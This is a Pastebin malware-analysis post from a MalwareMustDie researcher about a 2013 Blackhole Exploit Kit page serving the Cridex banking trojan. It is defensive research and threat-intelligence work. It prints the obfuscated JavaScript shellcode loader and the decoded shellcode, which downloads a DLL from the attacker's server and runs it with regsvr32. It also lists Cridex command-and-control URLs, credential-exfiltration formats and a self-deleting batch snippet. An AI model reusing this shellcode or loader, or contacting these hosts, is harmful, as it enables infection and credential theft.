Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ==================================================================
- #MalwareMustDie! bash-2・02$ date
- Tue Mar 5 09:04:35 2013 @unixfreaxjp
- Proof of Concept of a NEW ACTIVE malware infector:
- IP: 46・4・77・145
- URL: h00p://46・4・77・145:8080/forum/links/column・php
- Verdict: Blackhole Exploit Kit 2・x
- Malware payload: Cridex
- ==================================================================
- --2013-03-06 01:57:44-- h00p://46・4・77・145:8080/forum/links/column・php
- seconds 0・00, Connecting to 46・4・77・145:8080・・・ seconds 0・00, connected・
- :
- GET /forum/links/column・php HTTP/1・0
- Referer: http://google・com/
- Host: 46・4・77・145:8080
- HTTP request sent, awaiting response・・・
- :
- HTTP/1・1 200 OK
- Server: nginx/1・0・10
- Date: Tue, 05 Mar 2013 16:57:21 GMT
- Content-Type: text/html; charset=CP-1251
- Connection: close
- X-Powered-By: PHP/5・3・18-1~dotdeb・0
- Vary: Accept-Encoding
- 200 OK
- Length: unspecified [text/html]
- Saving to: `column・php'
- 2013-03-06 01:57:47 (81・2 KB/s) - `column・php' saved [156811]
- $ cat ・/column・php
- :
- :
- function getShellCode(){
- var a = "
- 8200!%a482!%9551!%e034!%51c4!%e5c4!%34e0!%5191!%e0d4!%9174!%2421!%2191!%b191!%3421!%2191!%
- 9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%a5d4!%e4e0!%2191!%a1e5!%4421!%2191!%
- 9144!%f521!%51a1!%54e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%
- 70e4!%0181!%0181!%d121!%91c1!%f160!%60f1!%60c1!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%
- :
- 0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%
- b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%
- 964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%
- fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%
- e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%
- 0382!%ef08!%9ed0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%"・split("")・reverse()・
- join("");
- return a["replace"](/\%!/g, "%" + "u")
- }
- :
- // decoded・・・
- var a = "8200!%a482!%9551!%e034!%51c4!%e5c4!%34e0!%5191!%e0d4!%9174!%2421!%2191!%b191!%3421!%2191!%
- 9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%a5d4!%e4e0!%2191!%a1e5!%4421!%2191!%
- 9144!%f521!%51a1!%54e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%
- 70e4!%0181!%0181!%d121!%91c1!%f160!%60f1!%60c1!%c1e1!%7070!%8521!%c5c5!%8504!%2370!%15e1!%
- eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%
- :
- 0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%
- b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%
- 964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%
- fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%
- e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%
- 0382!%ef08!%9ed0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%"・split("")・reverse()・join("");
- var xxx= a["replace"](/\%!/g, "%" + "u");
- document・write(xxx);
- // into shellcodes・・・
- %u4141%u4141%u8366%ufce4%uebfc%u581O%uc931%u8166%uOde9%u8Ofe%u283O%ue24O%uebfa%ue8O5%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u2O5e%uf31b%ua34e%u1476%u5c2b%uO41b%uc6a9%u383d%ud7d7%ua39O%u1868%u6eeb%u2e11%ud35d%u1caf%uadOc%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b5O%u7edd%u5ea3%u2bO8%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda1O%u2O5c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6ea5%ud7c4%uOc7c%ua324%u2bfO%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%uO84O%u55a8%u1b24%u2b5c%uc3be%ua3db%u2O4O%udfa3%u2d42%ucO71%ud7bO%ud7d7%ud1ca%u28cO%u2828%u7O28%u4278%u4O68%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u474O%u2846%u4O28%u5a5d%u4544%ud77c%uab3e%u2Oec%ucOa3%u49cO%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%uOc74%uef24%uOc2c%u4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%u2OOc%uO5O8%uO85b%u4O7b%u28dO%u2828%u7ed7%ua324%u1bcO%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4cO6%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6caO%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u2O7e%ub4cO%ud7d6%ua6d7%u2666%ubOc4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%uO732%u4O58%u5c5c%u1258%uO7O7%u1e1c%u1cO6%u1fO6%uO61f%u1c19%u121d%u181O%u181O%u4eO7%u5a47%u455d%u44O7%u4641%u5b43%u4bO7%u4447%u455d%uO646%u4O58%u1758%u4e45%u1a15%u125f%u4419%u1912%u1244%u5e1a%u1912%uOe4e%u4d5a%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u4dOe%u1915%uOe43%u4c5e%u4c15%u43Oe%u1559%u284a%uOO28";
- // translate per api references・・・
- 0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
- 0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
- 0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
- 0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
- 0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
- 0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
- 0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
- // payload url・・
- h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b
- // download payload・・・ (for backup the PoC I uploaded here too: http://urlquery・net/report・php?id=1268437 )
- --2013-03-06 02:09:26-- h00p://46・4・77・145:8080/forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b
- seconds 0・00, Connecting to 46・4・77・145:8080・・・ seconds 0・00, connected・
- :
- GET /forum/links/column・php?mf=2w:1l:1l:2v:1f&re=2v:1k:1m:32:33:1k:1k:31:1j:1o&e=1k&vd=d&kq=b HTTP/1・0
- Host: 46・4・77・145:8080
- HTTP request sent, awaiting response・・・
- :
- HTTP/1・1 200 OK
- Server: nginx/1・0・10
- Date: Tue, 05 Mar 2013 17:09:03 GMT
- Content-Type: application/x-msdownload
- Connection: keep-alive
- X-Powered-By: PHP/5・3・18-1~dotdeb・0
- Pragma: public
- Expires: Tue, 05 Mar 2013 17:09:04 GMT
- Cache-Control: must-revalidate, post-check=0, pre-check=0
- Cache-Control: private
- Content-Disposition: attachment; filename="readme・exe"
- Content-Transfer-Encoding: binary
- Content-Length: 102400
- 200 OK
- Length: 102400 (100K) [application/x-msdownload]
- Saving to: `readme・exe'
- 2013-03-06 02:09:28 (53・1 KB/s) - `readme・exe' saved [102400/102400]
- //Faking MS Application (again・・・)
- StringFileInfo
- CompanyName
- Microsoft Corporation
- FileDescription
- OLE DocFile Property Page
- FileVersion
- 6・0・6000・16386 (vista_rtm・061101-2205)
- InternalName
- docprop・dll
- LegalCopyright
- Microsoft Corporation・ All rights reserved・
- OriginalFilename
- docprop・dll
- ProductName
- Microsoft
- Windows
- Operating System
- ProductVersion
- VarFileInfo
- Translation
- // Self deletion batch file:
- @echo off
- del /F /Q /A "%S"
- if exist "%S" goto R
- del /F /Q /A "%S"
- // Wrote files
- %Temp%\exp1・tmp・bat
- %Temp%\exp*・tmp・exe
- %AppData%\KB00927107・exe
- // Malware Process:
- C:\WINDOWS\system32\cmd・exe" /c "C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\exp1・tmp・bat""
- C:\Documents and Settings\<USER>\Application Data\KB00927107・exe
- C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\exp*・tmp・exe
- // Cridex Callbacks・・・
- h00p://209・17・186・246:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://203・171・234・53:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://64・85・53・168:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://161・246・35・117:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://202・29・5・195:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://213・214・74・5:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://174・121・67・199:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://174・143・234・138:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://18・79・3・253:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://141・219・153・206:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://72・251・206・90:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://149・156・96・9:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://212・68・63・82:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://88・119・156・20:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://91・199・155・222:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://194・249・217・8:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://109・168・106・162:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://85・214・143・90:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://195・191・22・97:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://188・138・96・241:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://31・3・103・101:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://213・251・164・83:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://82・100・228・130:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://194・97・99・120:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- h00p://78・47・153・131:8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/
- // Cridex sent Credential formats:
- application/x-www-form-urlencoded
- <http time="%%%uu"><url><![CDATA[%%・%us]]></url><useragent><![CDATA[%%・%us]]></useragent><data><![CDATA[
- ]]></data></http>
- <httpshot time="%%%uu"><url><![CDATA[%%・%us]]></url><data><![CDATA[
- ]]></data></httpshot>
- <ftp time="%%%uu"><server><![CDATA[%%u・%%u・%%u・%%u:%%u]]></server><user><![CDATA[%%・%us]]></user><pass><![CDATA[
- ]]></pass></ftp>
- <pop3 time="%%%uu"><server><![CDATA[%%u・%%u・%%u・%%u:%%u]]></server><user><![CDATA[%%・%us]]></user><pass><![CDATA[
- ]]></pass></pop3>
- <cmd id="%u">%u</cmd>
- <cert time="%u"><pass><![CDATA[
- ]]></pass><data><![CDATA[
- ]]></data></cert>
- <ie time="%u"><data><![CDATA[
- ]]></data></ie>
- <ff time="%u"><data><![CDATA[
- ]]></data></ff>
- <mm time="%u"><data><![CDATA[
- ]]></data></mm>
- <message set_hash="%%・%us" req_set="%%%%u" req_upd="%%%%u"><header><unique>%%・%us</unique><version>%%u</version><system>%%u</system><network>%%u</network></header><data>
- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
- </data></message>
- //Credentials stealer scripts commands:
- settings
- commands
- hash
- httpshots
- formgrabber
- redirects
- bconnect
- httpinjects
- //Botnets commands:
- Connection
- modify
- pattern
- replacement
- httpinject
- conditions
- actions
- redirect
- process
- // Virus Total check・・・
- URL: https://www・virustotal・com/en/file/a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405/analysis/1362504075/
- SHA256: a7a2e20afb5d04ea9798e21559d6cbbe575785d6d9d00c0693ae90a299d8d405
- SHA1: 014fe37cd0b08936b54dabb2d44ca0901f741184
- MD5: 31de2e1b48a8341c3732b97e61712a56
- File size: 100・0 KB ( 102400 bytes )
- File name: docprop・dll
- File type: Win32 EXE
- Tags: peexe
- Detection ratio: 2 / 46 <========== VERY LOW!!!
- Analysis date: 2013-03-05 17:08:27 UTC ( 14 minutes ago )
- Fortinet : W32/Kryptik・ALRY!tr
- Kaspersky : UDS:DangerousObject・Multi・Generic
- ----
- #MalwareMustDie!!
- @unixfreaxjp
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement